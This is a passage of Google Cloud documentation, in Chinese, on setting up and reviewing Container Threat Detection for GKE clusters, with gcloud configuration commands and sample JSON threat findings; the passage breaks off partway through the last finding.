使用 Container Threat Detection

本页介绍了如何在 Google Cloud 控制台中查看 Container Threat Detection 的发现结果,并提供 Container Threat Detection 发现结果的示例。

Container Threat Detection 是 Security Command Center 高级和企业层级的内置服务。

如需查看 Container Threat Detection 发现结果,您必须在 Security Command Center 服务设置中启用该服务。

如需详细了解如何查看和管理 Container Threat Detection 发现结果,请参阅本页面的查看发现结果

如需在项目级层激活 Container Threat Detection 和其他高级层级检测器,请参阅为项目激活 Security Command Center。企业版不支持项目级激活。

使用受支持的 GKE 版本

如需检测容器的潜在威胁,请确保集群位于受支持的 Google Kubernetes Engine (GKE) 版本上。Container Threat Detection 目前支持稳定、常规和快速频道上的以下 GKE 版本:

  • GKE Standard >= 1.15.9-gke.12
  • GKE Standard >= 1.16.5-gke.2
  • GKE Standard >= 1.17
  • GKE Standard >= 1.18.10-gke.1400
  • GKE Standard >= 1.19.2-gke.2000
  • GKE Standard >= 1.20
  • GKE Standard >= 1.21
  • GKE Autopilot >= 1.21.11-gke.900
  • GKE Standard 和 GKE Autopilot >= 1.22
  • GKE Standard 和 GKE Autopilot >= 1.23

Container Threat Detection 仅支持 Container-Optimized OS 节点映像。

启用 Container Threat Detection

激活 Security Command Center 的高级或企业版层级后,Container Threat Detection 默认处于启用状态,除非您选择在激活过程中将其停用。

如果您需要为组织或项目启用或停用 Container Threat Detection,可以在 Security Command Center 设置页面上执行此操作。如需了解详情,请参阅启用或停用内置服务

通过激活 Security Command Center 或使用后一种方法来启用 Container Threat Detection 时,请执行以下操作:

  1. 对于不支持的 GKE 版本上的任何集群,请先完成升级集群指南中的步骤。
  2. 确保您的集群具有足够的可用资源来运行 Container Threat Detection DaemonSet。
  3. 在 Google Cloud 控制台中,查看 Container Threat Detection 服务启用设置,以确保为您的集群启用 Container Threat Detection。

必需的 IAM 权限

Container Threat Detection 需要权限才能启用和停用自身,以及在 GKE 集群上管理 Container Threat Detection Agent。

如需授予所需权限,必须向 Container Threat Detection 服务代理(一种服务账号)授予 Container Threat Detection Service Agent (roles/containerthreatdetection.serviceAgent) IAM 角色。

从服务代理中移除此默认角色可能会阻止 Container Threat Detection 正常运行。

Container Threat Detection 使用的服务代理的名称因 Security Command Center 的激活方式和时间而异:

  • 如果 Security Command Center 在 2023 年 12 月 7 日之前激活,则 Container Threat Detection 会使用以下用户代管式服务代理:

    service-PROJECT_NUMBER@gcp-sa-ktd-control.iam.gserviceaccount.com

  • 如果 Security Command Center 是在2023 年 12 月 7 日之后在组织级层激活的,则 Container Threat Detection 会使用以下用户管理的组织级服务代理:

    service-org-ORGANIZATION_ID@gcp-sa-ktd-hpsa.iam.gserviceaccount.com

  • 如果 Security Command Center 是在2023 年 12 月 7 日之后在项目级层激活的,则 Container Threat Detection 会使用以下用户管理的组织级服务代理:

    service-project-PROJECT_NUMBER@gcp-sa-ktd-hpsa.iam.gserviceaccount.com

如需详细了解服务代理和 IAM 角色,请参阅以下内容:

自定义 GKE 节点服务账号所需的权限

为 GKE 节点使用自定义服务账号时,新的节点服务账号需要具有与容器威胁检测进行交互的权限。如需向服务账号授予这些权限,您需要为其授予 Service Account Token Creator 角色 (roles/iam.serviceAccountTokenCreator)。

  1. 向节点服务账号授予 Service Account Token Creator 角色:

    gcloud iam service-accounts add-iam-policy-binding \
      SERVICE_ACCOUNT_NAME \
      --member=serviceAccount:service-PROJECT_NUMBER@compute-system.iam.gserviceaccount.com \
      --role=roles/iam.serviceAccountTokenCreator
    

    替换以下值:

    • SERVICE_ACCOUNT_NAME 替换为新节点服务账号的电子邮件地址。
    • PROJECT_NUMBER 替换为部署容器威胁检测的项目编号。如果该项目不同于服务账号的项目,这一点至关重要。
  2. 在创建新节点服务账号的项目中启用 Container Threat Detection API:

    gcloud services enable containerthreatdetection.googleapis.com --project PROJECT_ID
    

    PROJECT_ID 替换为新节点服务账号所在项目的 ID。

检查 GKE 集群配置

如需使 Container Threat Detection 正常运行,如果您的集群位于 Virtual Private Cloud (VPC) 中,其网络必须满足路由、防火墙和 DNS 要求才能与 Google API 和服务通信。如需访问 Google API,请查看以下指南:

此外,GKE 集群配置或组织政策限制条件不得阻止创建或使用 Container Threat Detection 正常工作所需的任何对象。以下部分包含 Container Threat Detection 创建的 GKE 对象列表,并说明了如何配置基本 GKE 组件以使用 Container Threat Detection。

Kubernetes 对象

初始配置后,Container Threat Detection 会在已启用的集群中创建多个 GKE 对象。这些对象用于监控容器映像、管理特权容器和 pod,以及评估状态以生成检测结果。下表列出了对象、属性和基本函数。

对象 名称1 属性 功能
ClusterRole container-watcher-pod-reader 授予对 pod 的 getwatchlist 权限
ClusterRole pod-reader 授予对 pod 的 getwatchlist 权限
ClusterRoleBinding

container-watcher-pod-reader

gce:podsecuritypolicy:container-watcher

container-watcher-pod-reader ServiceAccount 授予 container-watcher-pod-readergce:podsecuritypolicy:privileged 角色
CustomResourceDefinition containerwatcherstatuses.containerthreatdetection.googleapis.com DaemonSet 状态报告
DaemonSet container-watcher2 特权 与 Linux 安全模块和容器引擎的互动
以读写权限装载 /host/ 与 Linux 安全模块的通信
以只读权限装载 /etc/container-watcher/secrets 以访问 container-watcher-token 身份验证
使用 hostNetwork 生成发现结果
映像
gke.gcr.io/watcher-daemonset
启用和升级
后端
containerthreatdetection-REGION.googleapis.com:443
生成发现结果
角色 container-watcher-status-reporter 具有 containerwatcherstatuses.containerthreatdetection.googleapis.com CustomResourceDefinition 的 getlistwatchcreateupdatepatch 动词的角色 允许更新 DaemonSet 状态信息
RoleBinding gce:podsecuritypolicy:container-watcher container-watcher-pod-reader ServiceAccount 授予 gce:podsecuritypolicy:privileged 角色 在启用 PodSecurityPolicy 时保留功能
container-watcher-status-reporter container-watcher-pod-reader ServiceAccount 授予 container-watcher-status-reporter 角色
Secret container-watcher-token Authentication
ServiceAccount container-watcher-pod-reader 启用、升级和停用

1 所有对象均位于 kube-system 命名空间中,container-watcher-pod-readergce:podsecuritypolicy:container-watcher 除外。

2 在安装、更新或移除 Container Threat Detection 期间,Kubernetes 可能会针对暂时缺失或不完整的 Kubernetes 对象或其他依赖项发出错误消息。例如,某个实例可能缺少 container-watcher-pod-reader 角色,这可能会导致无法安装 Pod 监视器。您可能会看到 serviceaccount "container-watcher-pod-reader" not found 等错误日志,表明存在此问题。通常,Container Threat Detection 完成流程后,这些错误会自动消除。除非这些错误持续存在超过几分钟,否则您可以放心地忽略它们。

PodSecurityPolicy 和准入控制器

PodSecurityPolicy 是您设置的一种准入控制器资源,用于验证有关在集群上创建和更新 Pod 的请求。Container Threat Detection 与在使用 enable-pod-security-policy 标志创建或更新集群时自动应用的 PodSecurityPolicy 兼容。具体来说,当 PodSecurityPolicy 启用时,Container Threat Detection 就会使用 gce.privileged 政策。

如果您使用自定义 PodSecurityPolicy 或其他准入控制器,则它们不得阻止创建或使用运行 Container Threat Detection 所需的对象。例如,基于网络钩子的准入控制器会拒绝或替换特权部署,这可能导致 Container Threat Detection 无法正常运行。

如需了解详情,请参阅使用 PodSecurityPolicies

从 Container Threat Detection 发现结果中排除环境变量

默认情况下,当 Container Threat Detection 生成发现结果时,它会报告该发现结果中引用的所有进程的环境变量。在调查攻击时,环境变量值可能很重要。但是,某些软件包会将密钥和其他敏感信息存储在环境变量中。为了防止 Container Threat Detection 在任何 Container Threat Detection 发现结果中包含进程环境变量,请使用 Google Cloud CLI 或 Security Command Center Management API 的 securityCenterServices.patch 方法在组织、文件夹或项目级层停用 REPORT_ENVIRONMENT_VARIABLES 模块。

例如,如需在项目中停用环境变量报告,请创建一个名为 module_config.yaml 的文件,其中包含以下内容:

REPORT_ENVIRONMENT_VARIABLES:
  intendedEnablementState: DISABLED

然后运行以下命令:

gcloud scc manage services update container-threat-detection \
    --module-config-file=module_config.yaml \
    --project=PROJECT_ID

如需恢复默认行为,请修改 module_config.yaml 以使其包含以下内容,然后再次运行该命令:

REPORT_ENVIRONMENT_VARIABLES:
  intendedEnablementState: ENABLED

如需查看用于管理服务的所有 gcloud CLI 命令,请参阅 gcloud scc manage services

从 Container Threat Detection 发现结果中排除 CLI 参数

所有进程都有一个或多个命令行 (CLI) 参数。默认情况下,当 Container Threat Detection 在发现结果中添加进程详细信息时,它会记录进程的 CLI 参数。在调查攻击时,CLI 参数值可能很重要。不过,某些用户可能会在 CLI 参数中传递密钥和其他敏感信息。为了防止 Container Threat Detection 在任何 Container Threat Detection 发现结果中包含进程 CLI 参数,请使用 Google Cloud CLI 或 Security Command Center Management API 的 securityCenterServices.patch 方法在组织、文件夹或项目级层停用 REPORT_CLI_ARGUMENTS 模块。

例如,如需在项目中停用 CLI 参数报告,请创建一个名为 module_config.yaml 的文件,其中包含以下内容:

REPORT_CLI_ARGUMENTS:
  intendedEnablementState: DISABLED

然后运行以下命令:

gcloud scc manage services update container-threat-detection \
    --module-config-file=module_config.yaml \
    --project=PROJECT_ID

如需恢复默认行为,请修改 module_config.yaml 以使其包含以下内容,然后再次运行该命令:

REPORT_CLI_ARGUMENTS:
  intendedEnablementState: ENABLED

如需查看用于管理服务的所有 gcloud CLI 命令,请参阅 gcloud scc manage services

资源使用情况

Container Threat Detection 设计为几乎不影响集群性能,并且不应导致任何集群操作延迟。

资源使用量取决于工作负载。但是,Container Threat Detection 的核心组件(即用户空间 DaemonSet 和 Linux 安全模块 (LSM))预估会对性能造成以下影响:

  • DaemonSet:最多 0.125 个 vCPU 和 300 MB 内存(基于为限制资源使用量而设置的硬性限制)。限制偶尔会进行重新评估,并且可以更改以优化性能,尤其是对于非常大的节点。
  • LSM:因工作负载特征而异,但是在 LSM 承压的情况下,我们观察到 CPU 不足 2% 而内存不足 1%。您可以在启用和不启用 Container Threat Detection 的情况下,通过对工作负载进行插桩来测试性能影响。

如果您是 BigQuery 客户,则可以启用 GKE 用量计量来监控 Container Threat Detection 的用户空间 DaemonSet 的资源使用量。如需在用量计量中查看用户空间 DaemonSet,请搜索命名空间 kube-system 和标签 k8s-app=container-watcher

GKE 用量计量无法跟踪专门用于 LSM 的内核 CPU 用量。该数据包含在总体 CPU 使用率中。

Container Threat Detection API

Container Threat Detection 会自动在启动期间启用 containerthreatdetection API,以允许查找工具。您不应直接与这一必需的 API 互动。停用此 API 会破坏 Container Threat Detection 生成新发现结果的能力。如果您不想再收到容器威胁检测结果,请在 Security Command Center 服务设置中停用 Container Threat Detection。

审核发现结果

当 Container Threat Detection 生成发现结果后,您可以在 Security Command Center 中查看它们。如果您配置了将日志导出到 Cloud Logging,还可以在 Cloud Logging 中查看发现结果。要生成发现结果并验证您的配置,您可以故意触发检测器并测试 Container Threat Detection

Container Threat Detection 具有以下延迟时间:

  • 新初始配置的组织或项目的启用延迟时间(3.5 小时)。
  • 新创建的集群的启用延迟时间(几分钟)。
  • 已启用的集群中的威胁检测延迟时间(几分钟)。

在 Google Cloud 控制台中查看发现结果

Security Command Center 的 IAM 角色可以在组织、文件夹或项目级层授予。您能否查看、修改、创建或更新发现结果、资产和安全来源,取决于您获授予的访问权限级别。如需详细了解 Security Command Center 角色,请参阅访问权限控制

要在 Security Command Center 中查看 Container Threat Detection 发现结果,请按以下步骤操作:

  1. 在 Google Cloud 控制台中,前往 Security Command Center 的发现结果页面。

    前往“发现结果”页面

  2. 选择您的 Google Cloud 项目或组织。
  3. 快速过滤条件部分的来源显示名称子部分中,选择 Container Threat Detection。发现结果的查询结果会更新为仅显示此来源的发现结果。
  4. 如需查看特定发现结果的详细信息,请点击类别列中的发现结果名称。 系统会打开发现结果的详细信息面板,并显示摘要标签页。
  5. 摘要标签页上,查看发现结果的详细信息,包括有关检测到的内容、受影响的资源的信息,以及您可以采取的发现结果修复步骤(如果有)。
  6. 可选:如需查看发现结果的完整 JSON 定义,请点击 JSON 标签页。

为了帮助您进行调查,威胁发现结果还包含指向以下外部资源的链接:

  • MITRE ATT&CK 框架条目。该框架解释了针对云资源的攻击伎俩,并提供修复指南。
  • VirusTotal,这是一项 Alphabet 自有服务,用于提供有关潜在恶意文件、脚本、网址和网域的上下文。

如需查看 Container Threat Detection 发现结果的列表,请参阅 Container Threat Detection 检测器

在 Cloud Logging 中查看发现结果

如需在 Cloud Logging 中查看 Container Threat Detection 发现结果,请执行以下操作:

  1. 转到 Google Cloud 控制台中 Cloud Logging 的“日志浏览器”页面。

    转到日志浏览器

  2. 在页面顶部的项目选择器中,选择要存储 Container Threat Detection 日志的项目。

  3. 点击查询构建器标签页。

  4. 资源下拉列表中,选择 Threat Detector

    • 要查看所有检测器的发现结果,请选择 all detector_name
    • 要查看特定检测器的发现结果,请选择其名称。
  5. 或者,在查询构建器文本框中输入 resource.type="threat_detector",然后点击运行查询

  6. 系统会使用您选择的日志更新该表。

  7. 创建高级日志查询以指定任意多个日志中的一组日志条目。

发现结果格式示例

此部分包含 Container Threat Detection 发现结果的 JSON 格式。

这些示例包含所有发现结果中最常见的字段。但是,某些发现结果可能不会显示部分字段。您看到的实际输出取决于资源的配置以及发现结果的类型和状态。 Kubernetes 和 containerd 中的信息会尽最大努力提供,但无法保证。

如需详细了解每个发现结果中的字段,请参阅资源:发现结果中的字段说明。

已执行添加的二进制文件

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "state": "ACTIVE",
    "category": "Added Binary Executed",
    "sourceProperties": {
      "VM_Instance_Name": "INSTANCE_ID",
      "Added_Binary_Kind": "Added",
      "Container_Image_Id": "CONTAINER_IMAGE_ID",
      "Container_Name": "CONTAINER_NAME",
      "Parent_Pid": 1.0,
      "Container_Image_Uri": "CONTAINER_IMAGE_URI",
      "Process_Creation_Timestamp": {
        "seconds": 1.617989997E9,
        "nanos": 1.17396995E8
      },
      "Pid": 53.0,
      "Pod_Namespace": "default",
      "Process_Binary_Fullpath": "BINARY_PATH",
      "Process_Arguments": ["BINARY_PATH"],
      "Pod_Name": "POD_NAME",
      "description": "A binary that was not part of the original container image
      was executed. If an added binary is executed by an attacker, this is a
      possible sign that an attacker has control of the workload and they are
      executing arbitrary commands.",
      "Environment_Variables": ["KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_SERVICE_PORT\u003d443", "HOSTNAME\u003dreconnect-
      test-4af235e12be6f9d9", "HOME\u003d/root",
      "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
      "PATH\u003d/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
      "KUBERNETES_PORT_443_TCP_PORT\u003d443",
      "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",
      "DEBIAN_FRONTEND\u003dnoninteractive",
      "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
      "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/"],
      "Container_Creation_Timestamp": {
        "seconds": 1.617989918E9,
        "nanos": 0.0
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-04-09T17:39:57.527Z",
    "createTime": "2021-04-09T17:39:57.625Z",
    "propertyDataTypes": {
      "Container_Image_Id": {
        "primitiveDataType": "STRING"
      },
      "Pod_Namespace": {
        "primitiveDataType": "STRING"
      },
      "Container_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Environment_Variables": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Added_Binary_Kind": {
        "primitiveDataType": "STRING"
      },
      "description": {
        "primitiveDataType": "STRING"
      },
      "Pid": {
        "primitiveDataType": "NUMBER"
      },
      "Process_Arguments": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Container_Image_Uri": {
        "primitiveDataType": "STRING"
      },
      "Pod_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Parent_Pid": {
        "primitiveDataType": "NUMBER"
      },
      "VM_Instance_Name": {
        "primitiveDataType": "STRING"
      },
      "Container_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
      }
    },
    "severity": "LOW",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.container.Cluster"
  }
}
    

已加载添加的库

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findingsFINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "state": "ACTIVE",
    "category": "Added Library Loaded",
    "sourceProperties": {
      "Process_Arguments": ["BINARY_PATH", "ADDED_LIBRARY_NAME"],
      "Parent_Pid": 1.0,
      "Container_Name": "CONTAINER_NAME",
      "Added_Library_Fullpath": "ADDED_LIBRARY_PATH",
      "Container_Image_Id": "CONTAINER_IMAGE_ID",
      "Container_Creation_Timestamp": {
        "seconds": 1.618004144E9,
        "nanos": 0.0
      },
      "Pod_Name": "POD_NAME",
      "Pid": 7.0,
      "description": "A library that was not part of the original container
      image was loaded. If an added library is loaded, this is a possible sign
      that an attacker has control of the workload and they are executing
      arbitrary code.",
      "VM_Instance_Name": "INSTANCE_ID",
      "Pod_Namespace": "default",
      "Environment_Variables": ["KUBERNETES_SERVICE_PORT\u003d443",
      "KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT", "HOSTNAME\u003dsuspicious-
      library", "LD_LIBRARY_PATH\u003d/tmp", "PORT\u003d8080",
      "HOME\u003d/root", "PYTHONUNBUFFERED\u003d1",
      "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
      "PATH\u003d/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/p
      ython3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
      , "KUBERNETES_PORT_443_TCP_PORT\u003d443",
      "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp", "LANG\u003dC.UTF-8",
      "DEBIAN_FRONTEND\u003dnoninteractive",
      "KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
      "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/home/vmagent/app"],
      "Process_Binary_Fullpath": "BINARY_PATH",
      "Added_Library_Kind": "Added",
      "Container_Image_Uri": "CONTAINER_IMAGE_uri"
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-04-09T21:36:13.069Z",
    "createTime": "2021-04-09T21:36:13.267Z",
    "propertyDataTypes": {
      "Container_Image_Id": {
        "primitiveDataType": "STRING"
      },
      "Added_Library_Fullpath": {
        "primitiveDataType": "STRING"
      },
      "Container_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Pod_Namespace": {
        "primitiveDataType": "STRING"
      },
      "Environment_Variables": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "description": {
        "primitiveDataType": "STRING"
      },
      "Process_Arguments": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Pid": {
        "primitiveDataType": "NUMBER"
      },
      "Container_Image_Uri": {
        "primitiveDataType": "STRING"
      },
      "Pod_Name": {
        "primitiveDataType": "STRING"
      },
      "Added_Library_Kind": {
        "primitiveDataType": "STRING"
      },
      "Parent_Pid": {
        "primitiveDataType": "NUMBER"
      },
      "VM_Instance_Name": {
        "primitiveDataType": "STRING"
      },
      "Container_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
      }
    },
    "severity": "LOW",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.container.Cluster"
  }
}
  

执行:已执行添加的恶意二进制文件

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
    "category": "Execution: Added Malicious Binary Executed",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-11-13T19:51:22.538Z",
    "database": {},
    "eventTime": "2023-11-13T19:51:22.383Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
                {
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
                }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "COMMAND_AND_CONTROL",
      "primaryTechniques": [
        "INGRESS_TOOL_TRANSFER"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/tmp/malicious-binary-dd922bc4ee3b49fd-should-trigger\"",
          "size": "68",
          "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
          "hashedSize": "68",
          "partiallyHashed": false
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"/tmp/malicious-binary-dd922bc4ee3b49fd-should-trigger\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.68.2.129:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-added-test-malicious-binary\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.68.2.129\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.68.2.129:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.68.2.129\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
          }
        ],
        "pid": "7",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "added_malicious_binary_executed"
    },
    "detectionPriority": "CRITICAL",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699905066",
            "nanos": 618571329
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1105/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal IP Link",
          "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
        }
      ],
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T19:51:06.618571329Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}
  

执行:添加了“已加载恶意库”

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
    "category": "Execution: Added Malicious Library Loaded",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-11-13T21:40:14.340Z",
    "database": {},
    "eventTime": "2023-11-13T21:40:14.209Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
                {
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
                }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "COMMAND_AND_CONTROL",
      "primaryTechniques": [
        "INGRESS_TOOL_TRANSFER"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/malicious_files/drop_mal_lib\"",
          "size": "5005064",
          "sha256": "fe2e70de9f77047d3bf5debe3135811300c9c69b937b7fd3e2ca8451a942d5fb",
          "hashedSize": "5005064",
          "partiallyHashed": false
        },
        "libraries": [
          {
            "path": "\"/tmp/added-malicious-library-299fd066380ce690-should-trigger\"",
            "size": "68",
            "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
            "hashedSize": "68",
            "partiallyHashed": false
          }
        ],
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"/malicious_files/drop_mal_lib\"",
          "\"/tmp/added-malicious-library-299fd066380ce690-should-trigger\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.108.174.129:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-added-malicious-library\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.108.174.129\""
          },
          {
